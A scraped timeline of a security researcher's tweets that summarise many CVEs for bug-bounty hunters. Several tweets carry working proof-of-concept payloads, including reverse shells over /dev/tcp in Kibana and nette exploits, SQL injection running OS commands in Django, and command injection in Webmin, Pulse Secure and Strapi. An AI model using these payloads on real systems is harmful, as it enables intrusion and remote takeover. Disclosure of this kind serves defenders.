chybeta
@chybeta
Followers
13,178
Following
2,234
Media
190
Statuses
445
looking forward to bug bounty collaboration
Joined August 2017
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
#母の日
• 224389 Tweets
#MothersDay
• 137704 Tweets
ヴィクトリアマイル
• 131981 Tweets
ストフェス
• 58861 Tweets
テンハッピーローズ
• 53769 Tweets
Chivas
• 43628 Tweets
カーネーション
• 39961 Tweets
Roger Corman
• 37014 Tweets
ナミュール
• 35804 Tweets
マスクトディーヴァ
• 30546 Tweets
Loma
• 25718 Tweets
WIN5
• 25648 Tweets
フィアスプライド
• 19360 Tweets
津村騎手
• 16939 Tweets
ツムツム
• 15495 Tweets
#SHOWチャンネル
• 13788 Tweets
ヴェルディ
• 11303 Tweets
G1初制覇
• 10779 Tweets
ライラック
• 10693 Tweets
ウンブライル
• 10261 Tweets
CVE-2020-5902 allows for unauthenticated attackers execute arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.
👇just an example
11
311
780
CVE-2019-15642 another Webmin Remote Code Execution (authenticated)
1. set User-Agent as webmin
2. set Authorization
3. set payload:
OBJECT CGI;print "Content-Type: chybeta\n\n";$cmd=`id`;print "$cmd";
4. post to /rpc.cgi
10
362
723
CVE-2019-8451 Unauthorized SSRF via REST API /plugins/servlet/gadgets/makeRequest
use @ to bypass the whitelisting !
👇 reading resources
@orange_8361
1
338
646
CVE-2019-7609 If you can't pop a shell via the last tweet , you can change poc like 👇
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'");//')
#BugBountyTips
#BugBounty
#bugbountytip
POC: kibana < 6.6.0
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
3
110
235
5
274
595
7
252
579
Apache Tomcat AJP Vulnerability (CNVD-2020-10487/CVE-2020-1938 ) .This vulnerability was discovered by a security researcher of Chaitin Tech .
You can read any webapps files or include a file to RCE .JUST A POC-GIF with no DETAILS
Tomcat has fix this vulnerability ,UPDATE!
19
273
535
CVE-2021-40438 Apache mod_proxy SSRF via uri-path
demo:
analysis:
1、
2、 (chinese)
4
165
446
after Apache HTTPd Path Traversal (CVE-2021-42013/41773)
I review the CVE-2018-19052 Lighttpd path traversal (credit
@orange_8361
)
3
125
436
CVE-2020-8218 Pulse Connect Secure post-auth RCE
https://x.x.x.x/dana-admin/license/downloadlicenses.cgi?cmd=download&txtVLSAuthCode=whatever
-n '($x="ls /",system$x); #' -e /data/runtime/tmp/tt/setcookie.thtml.ttc
1
183
362
CVE-2019-10758 post-auth Remote Code Execution in mongo-express < 0.54.0 via endpoints that uses the `toBSON` method
however there are lots of no-auth mongo-express ...
shodan:
poc:
3
183
357
CVE-2021-40346 HAProxy HTTP Smuggling and ACL bypass
analysis
1.
2.
demo:
1
107
318
CVE-2021-42013 & CVE-2021-41773
Apache HTTPd Path Traversal and Remote Code Execution
4
88
310
EXP for CVE-2019-14234 Django JSONField SQL Injection
Step1:
?data__breed'%3f'a') OR 1%3d2 %3bCREATE table cmd_exec(cmd_output text) -- OR ....
Step2:
?data__breed'%3f'a') OR 1%3d2 %3bCOPY cmd_exec FROM PROGRAM 'ping ' -- OR ...
3
154
296
CVE-2020-5410 Directory Traversal with spring-cloud-config-server
advisory:
analysis:
0
104
289
CVE-2021-26086 Pre-Auth Limited Remote File Read/Include in Jira Software Server
details:
2
106
273
CVE-2020-15227 PHP framework nette callback RCE
POC: /nette.micro?callback=shell_exec&cmd=bash%20-i%20>&%20/dev/tcp/'+lhost+'/'+lport+'0>&1
1
119
258
CVE-2021-43557 Apache APISIX Path traversal in request_uri variable
0
42
254
CVE-2019-3799: Directory Traversal with spring-cloud-config-server
1
90
245
CVE-2021-41163 Discourse RCE via malicious SNS subscription payload
advisory:
analysis:
1、
2、 (chinese)
0
94
244
CVE-2020-5504 SQLI in phpMyAdmin: A malicious user could inject custom SQL in place of their own username when creating queries to this page
fix:
3
110
231
POC: kibana < 6.6.0
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
3
110
235
Apache Struts RCE: S2-059 / CVE-2019-0230
Forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.
4
99
235
CVE-2020-1947 Remote Code Execution (RCE) Through YAML Deserialization in Apache ShardingSphere
2
91
230
CVE-2020-5412 Full-Read SSRF in spring-cloud-netflix-hystrix-dashboard
2
79
226
CVE-2021-30179 Apache Dubbo RCE via Java deserialization in the Generic filter
details
1.
2.
1
93
214
WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
POC: GET /wordpress/?static=1&order=asc
Fix: Remove the static query property
Analsyis:
1
87
203
backdoor in fake super socialat plugin(/wp-content/plugins/super-socialat/super_socialat.php)
base64_decode("c3lzdGVtKCJ3aG9hbWkiKTs=") =>
system("whoami");
4
80
199
CVE-2024-23917 Teamcity < 2023.11.3 unauth RCE
yes, CVE-2024-23917 ,
not CVE-2024-27198
4
30
204
CVE-2020-28949/CVE-2020-28948
RCE on Drupal via Phar Deserialization in PEAR Archive_Tar library.
Poc: phar => PHAR
PHAR://malicious_file.phar
0
63
202
CVE-2021-39115 Jira Service Management Server Template Injection in Email Templates
1
50
187
CVE-2020-7961 liferay-portal RCE: Unauthenticated Remote code execution via JSONWS (LPS-97029)
2
88
177
CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE
PHP template injection
4
62
175
CVE-2020-10204 Nexus Repository Manager 3 - Remote Code Execution
Well, EL Injection
1
59
168
CVE-2021-33193 Request splitting via HTTP/2 method injection and mod_proxy (Reported by
@albinowax
)
demo:
article:
1、
2、
2
66
171
POC:
http://localhost:8000/test/?q=20)
= 1 OR (select utl_inaddr.get_host_name((SELECT version FROM v%24instance)) from dual) is null%20 OR (1%2B1
analysis:
CVE-2020-9402 Django SQLI: Potential SQL injection via tolerance parameter in GIS functions and aggregates on Oracle
advisory:
fix commit:
0
33
69
0
90
162
SonicWALL SSL-VPN cgi-bin/jarrewrite.sh shellshock RCE
The version used by Hacking Team and this bank had the vulnerable bash version, but the cgi requests did not trigger the shellshock- except for the requests to a shell script, and there was one accessible: cgi-bin/jarrewrite.sh.
nnnnday - -
1
7
30
1
58
163
Gitlab 13.8.2 (2021-02-01) fix DNS rebinding protection bypass when allowing an IP address in Outbound Requests setting.
Gitlab SSRF ~
analysis:
3
58
156
CVE-2020-29453 Pre-Authorization Limited Arbitrary File Read in Jira Server
2
50
156
bounty calculation formula:
crontab(subdomain(amass+subfinder+...) + port(masscan + nmap) + screenshot + dirsearch) + slack = bug bounty
#bugbounty
#bugbountytips
#bugbountytip
7
51
154
CVE-2019-18622 SQLI in phpMyAdmin: A vulnerability was reported where a specially crafted database name can be used to trigger an SQL injection attack through the designer feature.
3
71
148
CVE-2021-25281 wheel_async unauth access + CVE-2021-25282 salt.wheel.pillar_roots.write directory traversal
something:
1
52
145
CVE-2023-35813 sitecore RCE
Exploiting ASP .NET TemplateParser to get RCE in Sitecore (CVE-2023-35813) and SharePoint (CVE-2023-33160) by
@mwulftange
in two parts: part 1 at is live now and part 2 will follow in a few days...stay tuned!
0
108
259
1
25
137
CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints.
4
32
126
CVE-2020-5405: Directory Traversal with spring-cloud-config-server. A malicious user, or attacker, can send a request using a specially crafted URL that can lead a directory traversal attack.
Advisory:
0
35
117
CVE-2019-12409: Apache Solr RCE vulnerability due to bad config default (JMX )
jython xxx 18983 command super_secret "ls -la"
0
57
118
CVE-2020-7471: SQLI in Django:
django.contrib.postgres.aggregates.StringAgg aggregation function was subject to SQL injection, using a suitably crafted delimiter.
FIX:
0
55
118
CVE-2019-5475 Nexus Repository Manager 2 - OS Command Injection (authenticated)
Security Advisories
Fix:
1
50
117
CVE-2022-23529 🤣
Hey look, I've just found a seRioUs vulnerability in Java System.out.println() method
Just by executing System.out.println() with a malicious Object with the method toString() is override, our mAlicIous code will get executed remotely ( ͡° ͜ʖ ͡°)
35
96
626
3
28
120
analysis for CVE-2023-22518
confluence unauth RCE
CVE-2023-22518 - Improper Authorization Vulnerability In Confluence Data Center and Server
Don’t use and never use this vulnerability lightly,because it is a master of data cleaning
5
57
227
1
23
106
CVE-2020-25592 Any value for "eauth"/"token” allow a user to bypass auth and make calls to Salt SSH.
CVE-2020-16846 A user could use shell injections with the Salt API using the SSH Client.
25592+16846=Unauth RCE
分析
0
35
102
XXE?
Somebody tell me this is not a dream 😅 Yay, I was awarded a $200,000 🔥 bounty on
@Hacker0x01
!
#TogetherWeHitHarder
239
163
2K
7
3
99
CVE-2020-29448 Pre-Authorization Limited Arbitrary File Read in Confluence Server
0
48
98
CVE-2019-19268 rConfig 3.9.2 Local Privilege Escalation:
CVE-2019-19268 + CVE-2019-16663 / CVE-2019-16662 = Full ROOT ACCESS
about CVE-2019-16663 / CVE-2019-16662
1
44
99
CVE-2019-19609 Strapi Framework Post-Auth RCE
curl -H $'Authorization: Bearer [jwt]' ... --data {"plugin": "documentation && $(whoami > /tmp/whoami)","port":"1337"}
2
41
95
CVE-2019-14287 sudo -u#-1 xxxx
This can be used by a user with sufficient sudo privileges to run
commands as root even if the Runas specification explicitly disallows
root access as long as the ALL keyword is listed first in
the Runas specification.
0
32
96
How to hack windows? Just upload a fake CVE-2019-0708 POC and wait script kids run it ...😎
6
20
91
DIFFERENT + MIX = SSRF BYPASS
Bypass SSRF protection with different encodings.
A thread.
🧵👇
14
285
701
0
22
93
In 2023, I found RCE in xxx[.]target[.]com and then the server take down
But in 2024, I found new RCE in xxx-stage[.]target[.]com
🤣
4
3
87